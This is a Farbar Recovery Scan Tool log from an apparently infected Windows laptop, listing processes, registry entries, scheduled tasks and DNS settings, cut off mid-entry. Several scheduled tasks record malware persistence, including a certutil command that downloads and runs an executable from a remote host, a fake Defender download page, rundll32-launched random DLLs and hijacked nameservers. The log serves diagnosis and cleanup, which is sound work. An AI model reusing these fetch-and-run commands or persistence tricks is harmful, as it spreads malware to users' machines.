Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 3-07-2019 Ran by virk_ps (administrator) on PSV (Hewlett-Packard HP 2000 Notebook PC) (04-07-2019 23:37:57) Running from C:\Users\virk_ps\Downloads Loaded Profiles: virk_ps & niroco & niLXIDiscovery (Available Profiles: virk_ps & niroco & niLXIDiscovery) Platform: Windows 10 Education Version 1903 18362.207 (X64) Language: English (United Kingdom) Default browser: FF Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) () [File not signed] C:\Cadence\LicenseManager\cdslmd.exe () [File not signed] C:\Program Files\MySQL\MySQL Server 5.7\bin\mysqld.exe () [File not signed] C:\Program Files\WindowsApps\Microsoft.YourPhone_1.19061.410.0_x64__8wekyb3d8bbwe\YourPhone.exe (Andrea Electronics -> Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Flexera Software LLC -> Flexera Software LLC) C:\Cadence\LicenseManager\lmgrd.exe (Flexera Software LLC -> Flexera Software LLC) C:\Cadence\LicenseManager\lmgrd.exe (Google Inc -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.34.7\GoogleCrashHandler.exe (Google Inc -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.34.7\GoogleCrashHandler64.exe (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxTray.exe (Kepware Technologies -> Kepware Technologies) C:\Program Files (x86)\National Instruments\Shared\NI OPC Servers\V5\keysvc.exe (Kepware Technologies -> Kepware Technologies) C:\Program Files (x86)\National Instruments\Shared\NI OPC Servers\V5\server_eventlog.exe (Kepware Technologies -> Kepware Technologies) C:\Program Files (x86)\National Instruments\Shared\NI OPC Servers\V5\server_runtime.exe (McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\3.1.233.0\McCSPServiceHost.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\Common Files\McAfee\VSCore_19_3\mcapexe.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\McAfee\MQS\QcShm.exe (McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe (McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe (McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe (McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe (McAfee, LLC -> McAfee, Inc.) C:\Program Files\McAfee\WebAdvisor\servicehost.exe (McAfee, LLC -> McAfee, Inc.) C:\Program Files\McAfee\WebAdvisor\uihost.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\browser_broker.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeSH.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\usocoreworker.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\MAX\nimxs.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\PXI\nipxicms.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\NIWebServiceContainer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\NIWebServiceContainer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\NIWebServiceContainer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\NIWebServiceContainer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\NIWebServiceContainer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\NIWebServiceContainer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\NIWebServiceContainer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\niauth\niauth_daemon.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\nisvcloc\nisvcloc.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI-VISA\niLxiDiscovery.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files\National Instruments\Shared\roco\niroco.exe (National Instruments Corporation -> National Instruments Corporation) C:\Program Files\National Instruments\Shared\Sync Domain\nisds.exe (National Instruments Corporation -> National Instruments Corporation) C:\Windows\SysWOW64\lkads.exe (National Instruments Corporation -> National Instruments Corporation) C:\Windows\SysWOW64\lktsrv.exe (National Instruments Corporation -> National Instruments Corporation) C:\Windows\SysWOW64\nicitdl5.exe (National Instruments Corporation -> National Instruments Corporation) C:\Windows\SysWOW64\nidevldu.exe (National Instruments Corporation -> National Instruments Corporation) C:\Windows\SysWOW64\nipxism.exe (Nitro Software, Inc. -> Nitro Software, Inc.) C:\Program Files\Nitro\Reader 5\NitroPDFReaderDriverService5x64.exe (Oracle America, Inc. -> Oracle Corporation) H:\xic\tps\win64\jre\bin\java.exe (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (SafeNet, Inc. -> SafeNet Inc.) C:\Windows\System32\hasplms.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (Xebiro Limited -> ) C:\ProgramData\WIFIService\WIFIService.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-04-28] (Synaptics Incorporated -> Synaptics Incorporated) HKLM-x32\...\Run: [EaseUS EPM Tray Agent] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 12.8\bin\TrayPopupE\TrayTipAgentE.exe [255072 2014-11-18] (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] HKLM-x32\...\Run: [NI Device Monitor] => C:\Program Files (x86)\National Instruments\NI Device Monitor\DeviceMonitor.exe [152064 2017-03-22] (National Instruments Corporation) [File not signed] HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-961552698-412199883-319453439-1001\...\Run: [MySQL Notifier] => C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySqlNotifier.exe [754176 2016-07-29] (Oracle Corporation) [File not signed] HKU\S-1-5-21-961552698-412199883-319453439-1001\...\Run: [NIRegistrationWizard] => C:\Program Files (x86)\National Instruments\Shared\RegistrationWizard\Bin\RegistrationWizard.exe [819248 2017-03-20] (National Instruments Corporation -> National Instruments Corporation) HKU\S-1-5-21-961552698-412199883-319453439-1001\...\Run: [Spotify] => C:\Users\virk_ps\AppData\Roaming\Spotify\Spotify.exe [25641888 2019-07-01] (Spotify AB -> Spotify Ltd) HKU\S-1-5-21-961552698-412199883-319453439-1001\...\Policies\Explorer: [NoSecurityTab] 0 HKU\S-1-5-80-1122491841-3392631692-228128370-2991616343-3360392805\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-03-19] (Microsoft Windows -> Microsoft Corporation) HKU\S-1-5-80-63272789-367670524-4235130887-501008514-333400210\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-03-19] (Microsoft Windows -> Microsoft Corporation) HKLM\...\Drivers32: [VIDC.MPG4] => C:\Windows\SysWOW64\mpg4c32.dll [420240 2001-05-11] (Microsoft Corporation -> Microsoft Corporation) HKLM\...\Drivers32: [VIDC.MP42] => C:\Windows\SysWOW64\mpg4c32.dll [420240 2001-05-11] (Microsoft Corporation -> Microsoft Corporation) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-07-03] (Google LLC -> Google LLC) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\LabRIO USB Monitor.lnk [2018-01-10] ShortcutTarget: LabRIO USB Monitor.lnk -> C:\Program Files (x86)\National Instruments\Shared\myRIO\ni_usbmon.exe (National Instruments Corporation -> National Instruments Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NI Error Reporting.lnk [2019-04-21] ShortcutTarget: NI Error Reporting.lnk -> C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe (National Instruments Corporation -> National Instruments Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Xilinx Information Center.lnk [2019-06-24] ShortcutTarget: Xilinx Information Center.lnk -> H:\xic\xic.exe (Xilinx, Inc. -> ) GroupPolicy: Restriction - Chrome <==== ATTENTION GroupPolicy\User: Restriction ? <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {00678E67-1AD4-4805-9F24-669CF4C84E05} - System32\Tasks\Sk2545Pl => C:\Users\virk_ps\AppData\Roaming\prunld1171\he88043.exe [1387872 2019-06-24] ( ) [File not signed] Task: {02FFDCEB-8DF6-4404-9DA6-53B6E54357E7} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.1.222\DADUpdater.exe [4178840 2019-06-04] (McAfee, Inc. -> McAfee, Inc.) Task: {090052D5-8526-4A7C-BCCC-8795EF86379D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {0B6F6E0B-93C2-4E82-9A44-A844FD0CCC65} - System32\Tasks\{02D17E98-9843-84D7-912D-69D8A69DE031} => C:\Users\virk_ps\AppData\Roaming\Lomutete\Susofoce.exe Task: {168CDD68-79FF-40FB-BE34-01DDE3DC3985} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe Task: {1967CB48-D491-4BD4-B256-07A5D1A9BC5D} - System32\Tasks\MySQL\Installer\ManifestUpdate => C:\Program Files (x86)\MySQL\MySQL Installer for Windows\MySQLInstallerConsole.exe [53800 2016-11-01] (Oracle America, Inc. -> Oracle Corporation) Task: {240B3807-E7CB-47C1-84EC-F3A388CFA119} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {263176BE-CE64-43FC-AB30-B2096D62C2F0} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-04-28] (Synaptics Incorporated -> Synaptics Incorporated) Task: {2B0F7F61-D1CC-41CE-AB81-87C42A87EB1D} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed] Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe Task: {3704B150-F8EB-4E71-B4E3-C6A3F3336FD0} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyUpload => {EBF00FCB-0769-4B81-9BEC-6C05514111AA} Task: {38888BE5-9CB6-455F-9C95-AC41A5955EF0} - System32\Tasks\NI OPC Servers 2016 => C:\Program Files (x86)\National Instruments\Shared\NI OPC Servers\V5\server_admin.exe [300656 2016-01-08] (Kepware Technologies -> Kepware Technologies) Task: {3A75053F-E3EC-4DBD-A698-FF7E2C97FBE8} - System32\Tasks\NuWcWvyREcjfkrP2 => rundll32 "C:\Program Files (x86)\HrhLJefZU\HYxfty.dll",#1 Task: {4468BCAA-1C22-4A3F-8C5E-705E2FC56CBD} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [1026752 2019-03-29] (McAfee, Inc. -> McAfee, Inc.) Task: {57F51569-2D6C-4E44-8464-909570CD0505} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8505088 2015-07-03] (Realtek Semiconductor Corp -> Realtek Semiconductor) Task: {5A3FB241-0B11-4EA5-BC66-0D9F1B406040} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\BthSQM => {C8367320-6F85-11E0-A1F0-0800200C9A66} C:\WINDOWS\System32\BthTelemetry.dll [32256 2019-03-19] (Microsoft Windows -> Microsoft Corporation) Task: {62D30A7A-1D20-49CF-88D7-734D2F1C3EDD} - System32\Tasks\MySQLNotifierTask => C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySQLNotifier.exe [754176 2016-07-29] (Oracle Corporation) [File not signed] Task: {66E73A7D-4480-4AFA-8125-B333684270E0} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\WINDOWS\SysWOW64\Microsoft\Protect\S-1-47-19\RB_1.4.80.49.exe <==== ATTENTION Task: {6C18A9B6-C8EB-4CB6-B0BE-B6BC08F3F291} - System32\Tasks\MATLAB R2016a Startup Accelerator => C:\Program Files\MATLAB\R2016a\bin\win64\MATLABStartupAccelerator.exe [44544 2015-12-28] () [File not signed] Task: {6DFCB649-0769-4F83-BB10-F60F235F6D3D} - System32\Tasks\Microsoft\Windows\SkyDrive\Idle Sync Maintenance Task => {BF6C1E47-86EC-4194-9CE5-13C15DCB2001} Task: {7A1C567B-7ACF-46BD-96F8-57CEDDD25842} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_207_pepper.exe [1452600 2019-06-14] (Adobe Inc. -> Adobe) Task: {7B1FEC16-C938-44FE-BF85-6768E50E6A29} - System32\Tasks\ZjcKAahBLSqdO2 => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\XnuNNbyLBVswFYVB\QIXFKHW.wsf" Task: {7B78F66C-3467-4A45-9FCA-DEA286AF1CD4} - System32\Tasks\{20613B30-4BE6-9A2E-4F07-54987EEE6FCA} => C:\Users\virk_ps\AppData\Local\20613B~1\SYNCVE~1.EXE <==== ATTENTION Task: {7F93EDE9-67DE-4194-A77C-D68E958E81BA} - System32\Tasks\TdTMOZLIgCBDHq => rundll32 "C:\Program Files (x86)\ZUFMPmTZdtsU2\jHzYZxFfgtRyL.dll",#1 Task: {836204DB-EC8E-439A-AD4F-2851B6903EC9} - System32\Tasks\NIUpdateServiceStartupTask => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [874376 2018-03-05] (National Instruments Corporation -> National Instruments Corporation) Task: {872D0E53-FD2E-41E3-B431-698AF82882CE} - System32\Tasks\Microsoft\Windows\SkyDrive\Routine Maintenance Task => {1B1F472E-3221-4826-97DB-2C2324D389AE} Task: {87FBF609-E052-466B-A8DE-B95120E3B242} - System32\Tasks\atjcrjesXItFrEqGbjE2 => rundll32 "C:\Program Files (x86)\EUlvVIReVwBbC\iOvgdfD.dll",#1 Task: {8B0DC397-3F79-484D-8730-95EE4240DDE4} - System32\Tasks\JKIUpdateTask => C:\Program Files (x86)\JKI\VI Package Manager\support\JKIUpdate.exe [545024 2017-02-03] (JKI -> JKI) [File not signed] Task: {905292EF-3808-497F-8B58-C255F9683EF9} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe [4469000 2019-01-31] (McAfee, Inc. -> McAfee, Inc.) Task: {9285E4AA-29AB-480B-8AEF-A88ADC7E32BD} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [756672 2018-11-13] (McAfee, Inc. -> McAfee, Inc.) Task: {9F47FF6D-A1D7-442D-8702-CF135D8E912C} - System32\Tasks\NyepAIDvKQYBHlkRx2 => rundll32 "C:\Program Files (x86)\GxnrpAHsxxEDoptHbBR\ycaHxNq.dll",#1 Task: {AA85C8B3-1DCF-458A-BC84-3EBAB19D0C9D} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\virk_ps\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\virk_ps\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {AB42F39B-F860-43F0-B087-502E2FF3D0A3} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [1026752 2019-03-29] (McAfee, Inc. -> McAfee, Inc.) Task: {AD514700-267A-415B-89A1-45285EE5E097} - System32\Tasks\PPI Update => C:\WINDOWS\explorer.exe "hxxp://windowsdefender.club/warning/download.php?mn=5623" <==== ATTENTION Task: {B38BFCC8-454B-45FA-8A6A-1AD3106BA00A} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe <==== ATTENTION Task: {C3D66873-BB33-4E63-B0B7-E607191833EB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156456 2019-07-03] (Google Inc -> Google LLC) Task: {C9671835-FBBC-4B0D-B5B5-D31F06EA1A54} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-06-14] (Adobe Inc. -> Adobe) Task: {CE2DE968-E342-40D7-9566-427D45E4A886} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371} Task: {D88F114B-C354-43F7-B059-7A4384657DF2} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156456 2019-07-03] (Google Inc -> Google LLC) Task: {DD9BA56F-3CFA-443F-96C8-7E551BEC3D51} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {EEC3663E-7474-4D5B-A887-3FDABE75BF81} - System32\Tasks\AdobeGCInvoker-1.0-PSV-virk_ps => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe Task: {F85F1888-B367-401F-8F19-1E9E97341E7D} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1402624 2015-07-03] (Realtek Semiconductor Corp -> Realtek Semiconductor) Task: {F9E1F2B6-B45C-4E3C-A06C-F8092B473C27} - System32\Tasks\Adobe Uninstaller => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe Task: {FEE02A61-A545-4FB0-A74B-9C24B0E4356B} - System32\Tasks\NIUpdateServiceCheckTask => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [874376 2018-03-05] (National Instruments Corporation -> National Instruments Corporation) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\MATLAB R2016a Startup Accelerator.job => C:\Program Files\MATLAB\R2016a\bin\win64\MATLABStartupAccelerator.exe Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe Task: C:\WINDOWS\Tasks\{02D17E98-9843-84D7-912D-69D8A69DE031}.job => C:\Users\virk_ps\AppData\Roaming\Lomutete\Susofoce.exe Task: C:\WINDOWS\Tasks\{20613B30-4BE6-9A2E-4F07-54987EEE6FCA}.job => C:\Users\virk_ps\AppData\Local\20613B~1\SYNCVE~1.EXE <==== ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.43.1 Tcpip\..\Interfaces\{55424077-af9d-403e-81f9-a3fe9e048e1d}: [NameServer] 185.4.65.4,116.203.6.218,185.130.104.222,185.4.64.13 Tcpip\..\Interfaces\{55424077-af9d-403e-81f9-a3fe9e048e1d}: [DhcpNameServer] 192.168.43.1 Tcpip\..\Interfaces\{ac35077a-1404-4db5-baf2-5e8c5c9ecd5d}: [NameServer] 185.4.65.4,116.203.6.218,8.8.8.8,8.8.4.4,185.130.104.222,185.4.64.13 Tcpip\..\Interfaces\{c0c73fdf-ac93-4124-93f5-dc0e5a2d01c0}: [NameServer] 185.4.65.4,116.203.6.218,8.8.8.8,8.8.4.4,185.130.104.222,185.4.64.13,8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{f972fc9a-7c00-4c45-8343-4a5571f7fcfb}: [NameServer] 185.4.65.4,116.203.6.218,8.8.8.8,8.8.4.4,185.130.104.222,185.4.64.13 Internet Explorer: ================== HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-961552698-412199883-319453439-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_daltn_17_43_ssg03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0AtDtC0DyEzz0B0B0AtC0EtCtAyE0A0EtN0D0Tzu0StBtCtBzztN1L2XzutAtFtAyDtFtAtFyDyDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2StD0BtByB0B0EtC0BtGyC0AyEyBtGtCyB0FyCtGyDzztDtCtGtAtD0EyBtBtDzztC0DyCzz0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0ByEyBtD0E0BtAtGzy0FtA0FtGyE0ByE0EtGzy0FtA0CtG0A0Azy0CtByEyBzy0EtB0AyD2QtN0A0LzuyE%26cr%3D1491083554%26a%3Dwbf_daltn_17_43_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms} SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_daltn_17_43_ssg03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0AtDtC0DyEzz0B0B0AtC0EtCtAyE0A0EtN0D0Tzu0StBtCtBzztN1L2XzutAtFtAyDtFtAtFyDyDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2StD0BtByB0B0EtC0BtGyC0AyEyBtGtCyB0FyCtGyDzztDtCtGtAtD0EyBtBtDzztC0DyCzz0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0ByEyBtD0E0BtAtGzy0FtA0FtGyE0ByE0EtGzy0FtA0CtG0A0Azy0CtByEyBzy0EtB0AyD2QtN0A0LzuyE%26cr%3D1491083554%26a%3Dwbf_daltn_17_43_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_daltn_17_43_ssg03¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0AtDtC0DyEzz0B0B0AtC0EtCtAyE0A0EtN0D0Tzu0StBtCtBzztN1L2XzutAtFtAyDtFtAtFyDyDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2StD0BtByB0B0EtC0BtGyC0AyEyBtGtCyB0FyCtGyDzztDtCtGtAtD0EyBtBtDzztC0DyCzz0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0ByEyBtD0E0BtAtGzy0FtA0FtGyE0ByE0EtGzy0FtA0CtG0A0Azy0CtByEyBzy0EtB0AyD2QtN0A0LzuyE%26cr%3D1491083554%26a%3Dwbf_daltn_17_43_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 